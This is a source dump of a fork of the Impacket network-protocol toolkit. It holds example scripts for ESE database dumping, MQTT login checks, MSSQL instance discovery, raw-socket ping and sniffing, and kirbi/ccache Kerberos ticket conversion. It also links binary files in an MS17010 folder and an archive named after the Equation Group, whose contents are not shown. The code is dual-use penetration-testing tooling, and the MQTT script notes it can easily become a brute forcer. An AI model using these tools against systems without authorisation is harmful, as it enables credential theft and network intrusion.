https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/MS17010/zibe.dll
--------------------------------------------------------------------------------
/impacket/examples/MS17010/zlib1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/MS17010/zlib1.dll
--------------------------------------------------------------------------------
/impacket/examples/esentutl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # ESE utility. Allows dumping catalog, pages and tables.
12 | #
13 | # Author:
14 | # Alberto Solino (@agsolino)
15 | #
16 | # Reference for:
17 | # Extensive Storage Engine (ese)
18 | #
19 |
20 | from __future__ import division
21 | from __future__ import print_function
22 | import sys
23 | import logging
24 | import argparse
25 |
26 | from impacket.examples import logger
27 | from impacket import version
28 | from impacket.ese import ESENT_DB
29 |
30 |
def dumpPage(ese, pageNum):
    """Fetch page ``pageNum`` from the open database and call its ``dump()`` method.

    :param ese: database object exposing ``getPage``
    :param pageNum: page number, passed through to ``getPage`` unchanged
    """
    ese.getPage(pageNum).dump()
34 |
def exportTable(ese, tableName):
    """Print every record of ``tableName``, one ``column: value`` line per non-None column.

    :param ese: database object exposing ``openTable`` and ``getNextRow``
    :param tableName: name of the table to walk
    :return: None; logs an error and returns early when no cursor can be opened
    """
    cursor = ese.openTable(tableName)
    if cursor is None:
        logging.error('Can"t get a cursor for table: %s' % tableName)
        return

    print("Table: %s" % tableName)
    rowNumber = 1
    while True:
        try:
            record = ese.getNextRow(cursor)
        except Exception:
            # Best effort: report the failure and ask for the following row.
            # NOTE(review): this only terminates if getNextRow() advances the
            # cursor before raising; on a damaged or hostile database file that
            # is worth confirming, otherwise the loop spins on the same row.
            logging.debug('Exception:', exc_info=True)
            logging.error('Error while calling getNextRow(), trying the next one')
            continue

        # getNextRow() returning None marks the end of the table.
        if record is None:
            break

        print("*** %d" % rowNumber)
        for column in list(record.keys()):
            value = record[column]
            if value is not None:
                print("%-30s: %r" % (column, value))
        rowNumber += 1
58 |
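def main():
    """Command-line entry point: parse the arguments, open the ESE file, run one action.

    Actions are ``info`` (print the catalog), ``dump`` (dump one page) and
    ``export`` (print the records of one table). Errors raised by an action are
    printed, with a traceback when -debug is set, and the database is closed
    on every path.
    """
    print(version.BANNER)
    # Init the example's logger theme
    logger.init()

    parser = argparse.ArgumentParser(add_help = True, description = "Extensive Storage Engine utility. Allows dumping "
                                                                    "catalog, pages and tables.")
    parser.add_argument('databaseFile', action='store', help='ESE to open')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-page', action='store', help='page to open')

    subparsers = parser.add_subparsers(help='actions', dest='action')

    # dump page
    dump_parser = subparsers.add_parser('dump', help='dumps an specific page')
    dump_parser.add_argument('-page', action='store', required=True, help='page to dump')

    # info page
    subparsers.add_parser('info', help='dumps the catalog info for the DB')

    # export page (the help text used to repeat the one for 'info')
    export_parser = subparsers.add_parser('export', help='dumps the records of a table')
    export_parser.add_argument('-table', action='store', required=True, help='table to dump')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Sub-commands are optional for argparse, so a database path alone leaves
    # action unset. Stop here instead of failing later on None.upper().
    if options.action is None:
        parser.print_help()
        sys.exit(1)

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    ese = ESENT_DB(options.databaseFile)

    try:
        action = options.action.upper()
        if action == 'INFO':
            ese.printCatalog()
        elif action == 'DUMP':
            dumpPage(ese, int(options.page))
        elif action == 'EXPORT':
            exportTable(ese, options.table)
        else:
            raise Exception('Unknown action %s ' % options.action)
    except Exception as e:
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        print(e)
    finally:
        # Release the file even when the action is interrupted.
        ese.close()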
113 |
114 |
if __name__ == '__main__':
    main()
    # NOTE(review): the exit status is 1 on every path, including a successful
    # run, so a calling script cannot use it to tell success from failure.
    sys.exit(1)
118 |
--------------------------------------------------------------------------------
/impacket/examples/mqtt_check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple MQTT example aimed at playing with different login options. Can be converted into an account/password
12 | # brute forcer quite easily.
13 | #
14 | # Author:
15 | # Alberto Solino (@agsolino)
16 | #
17 | # Reference for:
18 | # MQTT and Structure
19 | #
20 |
21 | from __future__ import print_function
22 |
23 | import argparse
24 | import logging
25 | import sys
26 |
27 | from impacket import version
28 | from impacket.examples import logger
29 | from impacket.examples.utils import parse_target
30 | from impacket.mqtt import CONNECT_ACK_ERROR_MSGS, MQTTConnection
31 |
class MQTT_LOGIN:
    """Single MQTT CONNECT attempt against one target with one set of credentials."""

    def __init__(self, username, password, target, options):
        """Store the connection parameters.

        :param username: user name; an empty string is stored as None
        :param password: password, stored as given
        :param target: host to connect to
        :param options: parsed command-line options (``port``, ``ssl`` and
            ``client_id`` are read by ``run``)
        """
        self._options = options
        self._username = None if username == '' else username
        self._password = password
        self._target = target

    def run(self):
        """Open the connection, send CONNECT and log the first CONNECT_ACK message.

        Nothing is caught here: whatever ``MQTTConnection`` or ``connect``
        raises propagates to the caller.
        """
        port = int(self._options.port)
        mqtt = MQTTConnection(self._target, port, self._options.ssl)

        # A single space is sent when no client id was supplied.
        # NOTE(review): the -client-id help text says "default random";
        # confirm which of the two is intended.
        requested = self._options.client_id
        clientId = ' ' if requested is None else requested

        mqtt.connect(clientId, self._username, self._password)

        logging.info(CONNECT_ACK_ERROR_MSGS[0])
53 |
if __name__ == '__main__':
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)

    # add_help=False because the built-in -h/--help pair is replaced by a
    # --help-only option below.
    parser = argparse.ArgumentParser(add_help=False, description="MQTT login check")
    parser.add_argument("--help", action="help", help='show this help message and exit')
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')
    parser.add_argument('-client-id', action='store', help='Client ID used when authenticating (default random)')
    parser.add_argument('-ssl', action='store_true', help='turn SSL on')
    parser.add_argument('-port', action='store', default='1883', help='port to connect to (default 1883)')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    try:
        options = parser.parse_args()
    except Exception as e:
        logging.error(str(e))
        sys.exit(1)

    debugRequested = options.debug is True
    logging.getLogger().setLevel(logging.DEBUG if debugRequested else logging.INFO)
    if debugRequested:
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())

    # The password is taken from the target string on the command line.
    # The domain part is parsed but not used by this example.
    domain, username, password, address = parse_target(options.target)

    check_mqtt = MQTT_LOGIN(username, password, address, options)
    try:
        check_mqtt.run()
    except Exception as e:
        # Full traceback only in debug mode; the message is always logged.
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        logging.error(e)
90 |
--------------------------------------------------------------------------------
/impacket/examples/mssqlinstance.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # [MC-SQLR] example. Retrieves the instances names from the target host
12 | #
13 | # Author:
14 | # Alberto Solino (@agsolino)
15 | #
16 | # Reference for:
17 | # Structure
18 | #
19 |
20 | from __future__ import division
21 | from __future__ import print_function
22 | import argparse
23 | import sys
24 | import logging
25 |
26 | from impacket.examples import logger
27 | from impacket import version, tds
28 |
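if __name__ == '__main__':

    print(version.BANNER)
    # Init the example's logger theme
    logger.init()

    parser = argparse.ArgumentParser(add_help = True, description = "Asks the remote host for its running MSSQL Instances.")

    parser.add_argument('host', action='store', help='target host')
    parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    ms_sql = tds.MSSQL(options.host)
    instances = ms_sql.getInstances(int(options.timeout))
    if len(instances) == 0:
        # This used to be a bare string expression, which evaluates to nothing:
        # an empty answer produced no output at all.
        print("No MSSQL Instances found")
    else:
        for i, instance in enumerate(instances):
            logging.info("Instance %d" % i)
            # Each instance is a mapping of attribute name to value.
            for key in list(instance.keys()):
                print(key + ":" + instance[key])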
55 |
--------------------------------------------------------------------------------
/impacket/examples/ping.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple ICMP ping.
12 | #
13 | # This implementation of ping uses the ICMP echo and echo-reply packets
14 | # to check the status of a host. If the remote host is up, it should reply
15 | # to the echo probe with an echo-reply packet.
16 | # Note that this isn't a definite test, as in the case the remote host is up
17 | # but refuses to reply the probes.
18 | # Also note that the user must have special access to be able to open a raw
19 | # socket, which this program requires.
20 | #
21 | # Authors:
22 | # Gerardo Richarte (@gerasdf)
23 | # Javier Kohen
24 | #
25 | # Reference for:
26 | # ImpactPacket: IP, ICMP, DATA
27 | # ImpactDecoder
28 | #
29 |
30 | import select
31 | import socket
32 | import time
33 | import sys
34 |
35 | from impacket import ImpactDecoder, ImpactPacket
36 |
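# Two positional arguments are required: the source address written into the
# IP header and the destination address to probe.
if len(sys.argv) < 3:
    # The usage line now names both arguments; it used to print the script
    # name only.
    print("Use: %s <src ip> <dst ip>" % sys.argv[0])
    sys.exit(1)

src = sys.argv[1]
dst = sys.argv[2]

# Create a new IP packet and set its source and destination addresses.

ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)

# Create a new ICMP packet of type ECHO.

icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)

# Include a 156-character long payload inside the ICMP packet.
icmp.contains(ImpactPacket.Data(b"A"*156))

# Have the IP packet contain the ICMP packet (along with its payload).
ip.contains(icmp)

# Open a raw socket. Special permissions are usually required.
# IP_HDRINCL means the IP header built above is sent as is.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

seq_id = 0
while 1:
    # Give the ICMP packet the next ID in the sequence.
    seq_id += 1
    icmp.set_icmp_id(seq_id)

    # Calculate its checksum.
    icmp.set_icmp_cksum(0)
    icmp.auto_checksum = 1

    # Send it to the target host.
    s.sendto(ip.get_packet(), (dst, 0))

    # Wait up to one second for incoming replies.
    if s in select.select([s], [], [], 1)[0]:
        reply = s.recvfrom(2000)[0]

        # Use ImpactDecoder to reconstruct the packet hierarchy.
        rip = ImpactDecoder.IPDecoder().decode(reply)
        # Extract the ICMP packet from its container (the IP packet).
        ricmp = rip.child()

        # If the packet matches, report it to the user. Only the addresses
        # and the ICMP type are compared; the reply's id is printed but not
        # checked against seq_id.
        if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type():
            print("Ping reply for sequence #%d" % ricmp.get_icmp_id())

        time.sleep(1)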
92 |
--------------------------------------------------------------------------------
/impacket/examples/ping6.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple ICMP6 ping.
12 | #
13 | # This implementation of ping uses the ICMP echo and echo-reply packets
14 | # to check the status of a host. If the remote host is up, it should reply
15 | # to the echo probe with an echo-reply packet.
16 | # Note that this isn't a definite test, as in the case the remote host is up
17 | # but refuses to reply the probes.
18 | # Also note that the user must have special access to be able to open a raw
19 | # socket, which this program requires.
20 | #
21 | # Authors:
22 | # Alberto Solino (@agsolino)
23 | #
24 | # Reference for:
25 | # ImpactPacket: ICMP6
26 | # ImpactDecoder
27 | #
28 |
29 | import select
30 | import socket
31 | import time
32 | import sys
33 |
34 | from impacket import ImpactDecoder, IP6, ICMP6, version
35 |
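print(version.BANNER)

# Two positional arguments are required: the source and destination IPv6
# addresses.
if len(sys.argv) < 3:
    # The usage line now names both arguments; it used to print the script
    # name only.
    print("Use: %s <src ip> <dst ip>" % sys.argv[0])
    sys.exit(1)

src = sys.argv[1]
dst = sys.argv[2]

# Create a new IP packet and set its source and destination addresses.

ip = IP6.IP6()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
ip.set_traffic_class(0)
ip.set_flow_label(0)
ip.set_hop_limit(64)

# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)

payload = b"A"*156

print("PING %s %d data bytes" % (dst, len(payload)))
seq_id = 0
while 1:
    # Give the ICMP packet the next ID in the sequence.
    seq_id += 1
    icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload)

    # Have the IP packet contain the ICMP packet (along with its payload).
    ip.contains(icmp)
    ip.set_next_header(ip.child().get_ip_protocol_number())
    ip.set_payload_length(ip.child().get_size())
    icmp.calculate_checksum()

    # Send it to the target host. Only the ICMPv6 part goes on the socket;
    # the IP6 object above is not transmitted by this call.
    s.sendto(icmp.get_packet(), (dst, 0))

    # Wait up to one second for incoming replies.
    if s in select.select([s], [], [], 1)[0]:
        reply = s.recvfrom(2000)[0]

        # Use ImpactDecoder to reconstruct the packet hierarchy.
        rip = ImpactDecoder.ICMP6Decoder().decode(reply)

        # If the packet matches, report it to the user. Only the ICMPv6 type
        # is checked; the sender of the reply is not compared with dst, which
        # is what gets printed.
        if ICMP6.ICMP6.ECHO_REPLY == rip.get_type():
            print("%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4, dst, rip.get_echo_sequence_number()))

        time.sleep(1)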
87 |
--------------------------------------------------------------------------------
/impacket/examples/sniff.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple packet sniffer.
12 | #
13 | # This packet sniffer uses the pcap library to listen for packets in
14 | # transit over the specified interface. The returned packets can be
15 | # filtered according to a BPF filter (see tcpdump(3) for further
16 | # information on BPF filters).
17 | #
18 | # Note that the user might need special permissions to be able to use pcap.
19 | #
20 | # Authors:
21 | # Maximiliano Caceres
22 | # Javier Kohen
23 | #
24 | # Reference for:
25 | # pcapy: findalldevs, open_live
26 | # ImpactDecoder
27 | #
28 |
29 | import sys
30 | from threading import Thread
31 | import pcapy
32 | from pcapy import findalldevs, open_live
33 |
34 | from impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder
35 |
36 |
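class DecoderThread(Thread):
    """Thread that runs a pcap capture loop and prints every decoded packet."""

    def __init__(self, pcapObj):
        """Pick a decoder that matches the capture's link type.

        :param pcapObj: open capture object exposing ``datalink()`` and ``loop()``
        :raises Exception: when the link type is neither Ethernet nor Linux SLL
        """
        Thread.__init__(self)

        # Query the type of the link and instantiate a decoder accordingly.
        datalink = pcapObj.datalink()
        if pcapy.DLT_EN10MB == datalink:
            self.decoder = EthDecoder()
        elif pcapy.DLT_LINUX_SLL == datalink:
            self.decoder = LinuxSLLDecoder()
        else:
            # The message had no conversion specifier, so the % operator
            # raised TypeError instead of reporting the unsupported link type.
            raise Exception("Datalink type not supported: %s" % datalink)

        self.pcap = pcapObj

    def run(self):
        """Capture until the loop ends, calling packetHandler for every packet."""
        # Sniff ad infinitum.
        # PacketHandler shall be invoked by pcap for every packet.
        self.pcap.loop(0, self.packetHandler)

    def packetHandler(self, hdr, data):
        """Decode one raw packet and print it; ``hdr`` is not used."""
        # Use the ImpactDecoder to turn the rawpacket into a hierarchy
        # of ImpactPacket instances.
        # Display the packet in human-readable form.
        print(self.decoder.decode(data))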
61 |
62 |
def getInterface():
    """Return the capture interface to use, asking the user when there are several.

    Exits with status 1 when pcap reports no interface at all.
    """
    # Grab a list of interfaces that pcap is able to listen on.
    # The current user will be able to listen from all returned interfaces,
    # using open_live to open them.
    ifs = findalldevs()
    available = len(ifs)

    # No interfaces available, abort.
    if available == 0:
        print("You don't have enough permissions to open any interface on this system.")
        sys.exit(1)

    # Only one interface available, use it.
    if available == 1:
        print('Only one interface present, defaulting to it.')
        return ifs[0]

    # Ask the user to choose an interface from the list.
    for count, iface in enumerate(ifs):
        print('%i - %s' % (count, iface))

    # NOTE(review): the answer is not validated. Non-numeric input raises
    # ValueError, an index past the end raises IndexError, and a negative
    # number selects from the end of the list.
    idx = int(input('Please select an interface: '))

    return ifs[idx]
87 |
def main(filter):
    """Open the chosen interface, apply the BPF ``filter`` and start the sniffing thread.

    :param filter: BPF filter expression; the empty string matches everything
    """
    device = getInterface()

    # Open interface for capturing.
    # NOTE(review): the arguments look like snap length 1500, promiscuous off,
    # 100 ms read timeout; confirm against the pcapy open_live signature.
    capture = open_live(device, 1500, 0, 100)

    # Set the BPF filter. See tcpdump(3).
    capture.setfilter(filter)

    details = (device, capture.getnet(), capture.getmask(), capture.datalink())
    print("Listening on %s: net=%s, mask=%s, linktype=%d" % details)

    # Start sniffing thread and finish main thread.
    DecoderThread(capture).start()
101 |
# Process command-line arguments. Everything after the script name is joined
# into one BPF filter for pcap. With no arguments the join yields the empty
# filter (match all).
# Note: this runs at import time; there is no __main__ guard.
filter = ' '.join(sys.argv[1:])

main(filter)
109 |
--------------------------------------------------------------------------------
/impacket/examples/sniffer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple packet sniffer.
12 | #
13 | # This packet sniffer uses a raw socket to listen for packets
14 | # in transit corresponding to the specified protocols.
15 | #
16 | # Note that the user might need special permissions to be able to use
17 | # raw sockets.
18 | #
19 | # Authors:
20 | # Gerardo Richarte (@gerasdf)
21 | # Javier Kohen
22 | #
23 | # Reference for:
24 | # ImpactDecoder
25 | #
26 |
27 | from select import select
28 | import socket
29 | import sys
30 |
31 | from impacket import ImpactDecoder
32 |
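DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp')

if len(sys.argv) == 1:
    requested = DEFAULT_PROTOCOLS
    print("Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s <proto1> [proto2] ..." % sys.argv[0])
else:
    requested = sys.argv[1:]

# Open one socket for each specified protocol.
# A special option is set on the socket so that IP headers are included with
# the returned data.
#
# Accepted names go into a new list. The previous code removed unknown names
# from the sequence it was iterating over, which skipped the following entry
# and failed outright on the default tuple, which has no remove().
sockets = []
toListen = []
for protocol in requested:
    try:
        protocol_num = socket.getprotobyname(protocol)
    except socket.error:
        print("Ignoring unknown protocol:", protocol)
        continue
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    sockets.append(s)
    toListen.append(protocol)

if 0 == len(toListen):
    print("There are no protocols available.")
    sys.exit(0)

print("Listening on protocols:", toListen)

# Instantiate an IP packets decoder.
# As all the packets include their IP header, that decoder only is enough.
decoder = ImpactDecoder.IPDecoder()

while len(sockets) > 0:
    # Wait for an incoming packet on any socket.
    ready = select(sockets, [], [])[0]
    for s in ready:
        packet = s.recvfrom(4096)[0]
        if 0 == len(packet):
            # Socket remotely closed. Discard it.
            sockets.remove(s)
            s.close()
        else:
            # Packet received. Decode and display it.
            packet = decoder.decode(packet)
            print(packet)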
79 |
--------------------------------------------------------------------------------
/impacket/examples/ticketConverter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # This script will convert kirbi files (commonly used by mimikatz) into ccache files used by impacket,
12 | # and vice versa.
13 | #
14 | # Examples:
15 | # ./ticket_converter.py admin.ccache admin.kirbi
16 | # ./ticket_converter.py admin.kirbi admin.ccache
17 | #
18 | # Author:
19 | # Zer1t0 (https://github.com/Zer1t0)
20 | #
21 | # References:
22 | # - https://tools.ietf.org/html/rfc4120
23 | # - http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html
24 | # - https://github.com/gentilkiwi/kekeo
25 | # - https://github.com/rvazarkar/KrbCredExport
26 | #
27 |
28 | import argparse
29 | import struct
30 |
31 | from impacket import version
32 | from impacket.krb5.ccache import CCache
33 |
34 |
def parse_args():
    """Parse the two positional arguments: the input file and the output file."""
    cli = argparse.ArgumentParser()
    for name, description in (
        ('input_file', "File in kirbi (KRB-CRED) or ccache format"),
        ('output_file', "Output file"),
    ):
        cli.add_argument(name, help=description)
    return cli.parse_args()
40 |
41 |
def main():
    """Detect the input file's format from its first byte and convert to the other one."""
    print(version.BANNER)

    args = parse_args()
    source, destination = args.input_file, args.output_file

    # kirbi is tested first, then ccache; anything else is reported and
    # nothing is written.
    if is_kirbi_file(source):
        print('[*] converting kirbi to ccache...')
        convert_kirbi_to_ccache(source, destination)
        print('[+] done')
        return

    if is_ccache_file(source):
        print('[*] converting ccache to kirbi...')
        convert_ccache_to_kirbi(source, destination)
        print('[+] done')
        return

    print('[X] unknown file format')
57 |
58 |
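def is_kirbi_file(filename):
    """Return True when the file's first byte is 0x76.

    0x76 is the ASN.1 tag of an [APPLICATION 22] value, which is how a
    KRB-CRED message starts. Only this one byte is inspected, so a True
    result does not mean the rest of the file is well-formed.

    An empty file returns False; it used to raise struct.error because
    unpacking needs one byte.

    :param filename: path of the file to inspect
    :raises OSError: when the file cannot be opened
    """
    with open(filename, 'rb') as fi:
        first = fi.read(1)
    return first == b'\x76'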
63 |
64 |
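def is_ccache_file(filename):
    """Return True when the file's first byte is 0x05, the leading byte of a ccache file.

    Only this one byte is inspected, so a True result does not mean the rest
    of the file is well-formed.

    An empty file returns False; it used to raise struct.error because
    unpacking needs one byte.

    :param filename: path of the file to inspect
    :raises OSError: when the file cannot be opened
    """
    with open(filename, 'rb') as fi:
        first = fi.read(1)
    return first == b'\x05'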
69 |
70 |
def convert_kirbi_to_ccache(input_filename, output_filename):
    """Load a kirbi file and write it back out in ccache format.

    The output holds the same Kerberos credentials as the input.
    NOTE(review): the permissions of the written file depend on
    CCache.saveFile and are not set here; confirm they are restrictive enough.
    """
    CCache.loadKirbiFile(input_filename).saveFile(output_filename)
74 |
75 |
def convert_ccache_to_kirbi(input_filename, output_filename):
    """Load a ccache file and write it back out in kirbi format.

    The output holds the same Kerberos credentials as the input.
    NOTE(review): the permissions of the written file depend on
    CCache.saveKirbiFile and are not set here; confirm they are restrictive enough.
    """
    CCache.loadFile(input_filename).saveKirbiFile(output_filename)
79 |
80 |
81 | if __name__ == '__main__':
82 | main()
83 |
--------------------------------------------------------------------------------
/impacket/examples/方程式.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/方程式.zip
--------------------------------------------------------------------------------
/impacket/impacket.egg-info/dependency_links.txt:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/impacket/impacket.egg-info/requires.txt:
--------------------------------------------------------------------------------
1 | charset_normalizer
2 | dsinternals
3 | flask>=1.0
4 | future
5 | ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5
6 | ldapdomaindump>=0.9.0
7 | pyOpenSSL>=21.0.0
8 | pyasn1>=0.2.3
9 | pycryptodomex
10 | six
11 |
12 | [pyreadline:sys_platform=="win32"]
13 |
--------------------------------------------------------------------------------
/impacket/impacket.egg-info/top_level.txt:
--------------------------------------------------------------------------------
1 | impacket
2 |
--------------------------------------------------------------------------------
/impacket/impacket/Dot11Crypto.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IEEE 802.11 Network packet codecs.
11 | #
12 | # Author:
13 | # Gustavo Moreira
14 | #
15 |
class RC4():
    """RC4 stream cipher, kept for decoding legacy 802.11 traffic.

    RC4 has known keystream biases and should not protect new data.

    The permutation in ``self.state`` is updated by every ``encrypt`` call,
    while the two indices restart at zero each time. Use a fresh instance
    per message: decrypting on the instance that just encrypted does not
    start from the key-scheduled state.
    """

    def __init__(self, key):
        """Run the key schedule over ``key`` (a bytes-like value; must not be empty)."""
        key_bytes = bytearray(key)
        key_len = len(key)
        state = bytearray(range(256))
        j = 0
        for i in range(256):
            j = (j + state[i] + key_bytes[i % key_len]) & 0xff
            state[i], state[j] = state[j], state[i]  # SSWAP(i,j)
        self.state = state

    def encrypt(self, data):
        """XOR ``data`` with the keystream and return the result as bytes."""
        state = self.state  # same bytearray object, so swaps persist on self
        i = j = 0
        out = bytearray()
        for byte in bytearray(data):
            i = (i + 1) & 0xff
            j = (j + state[i]) & 0xff
            state[i], state[j] = state[j], state[i]  # SSWAP(i,j)
            out.append(byte ^ state[(state[i] + state[j]) & 0xff])

        return bytes(out)

    def decrypt(self, data):
        """Same operation as ``encrypt``: the cipher is a plain XOR with the keystream."""
        return self.encrypt(data)
39 |
--------------------------------------------------------------------------------
/impacket/impacket/Dot11KeyManager.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IEEE 802.11 Network packet codecs.
11 | #
12 | # Author:
13 | # Gustavo Moreira
14 |
15 | from array import array
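class KeyManager:
    """In-memory map from BSSID to key.

    BSSIDs are accepted as a list, tuple or array and stored as tuples so
    they can be used as dictionary keys.
    """

    def __init__(self):
        self.keys = {}

    def __get_bssid_hasheable_type(self, bssid):
        """Return ``bssid`` as a tuple; raise Exception for any other container type."""
        # List is an unhashable type
        if not isinstance(bssid, (list,tuple,array)):
            raise Exception('BSSID datatype must be a tuple, list or array')
        return tuple(bssid)

    def add_key(self, bssid, key):
        """Store ``key`` for ``bssid`` unless one exists; return True when it was stored."""
        bssid = self.__get_bssid_hasheable_type(bssid)
        if bssid in self.keys:
            return False
        self.keys[bssid] = key
        return True

    def replace_key(self, bssid, key):
        """Store ``key`` for ``bssid``, overwriting any existing entry; always returns True."""
        bssid = self.__get_bssid_hasheable_type(bssid)
        self.keys[bssid] = key

        return True

    def get_key(self, bssid):
        """Return the key stored for ``bssid``, or False when there is none."""
        bssid = self.__get_bssid_hasheable_type(bssid)
        if bssid in self.keys:
            return self.keys[bssid]
        return False

    def delete_key(self, bssid):
        """Remove the key stored for ``bssid``; return True when an entry was removed.

        An extra "must be a list" check used to run after the BSSID had been
        converted to a tuple, so it always raised and no key could ever be
        deleted. The type check in the conversion helper is the one that
        applies, as in the other methods.
        """
        bssid = self.__get_bssid_hasheable_type(bssid)

        if bssid in self.keys:
            del self.keys[bssid]
            return True

        return False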
57 |
--------------------------------------------------------------------------------
/impacket/impacket/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Author:
10 | # Alberto Solino (@agsolino)
11 | #
12 |
13 | # Set default logging handler to avoid "No handler found" warnings.
14 | import logging
try:  # Python 2.7+
    from logging import NullHandler
except ImportError:
    # Fallback for interpreters whose logging module has no NullHandler:
    # a handler that discards every record.
    class NullHandler(logging.Handler):
        def emit(self, record):
            pass

# All modules inside this library MUST use this logger (impacket)
# It is up to the library consumer to do whatever is wanted
# with the logger output. By default it is forwarded to the
# upstream logger

# Package-level logger, named after this package.
LOG = logging.getLogger(__name__)
# The no-op handler keeps the library silent until the consuming application
# configures logging itself.
LOG.addHandler(NullHandler())
29 |
--------------------------------------------------------------------------------
/impacket/impacket/dcerpc/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/dcerpc/v5/__init__.py:
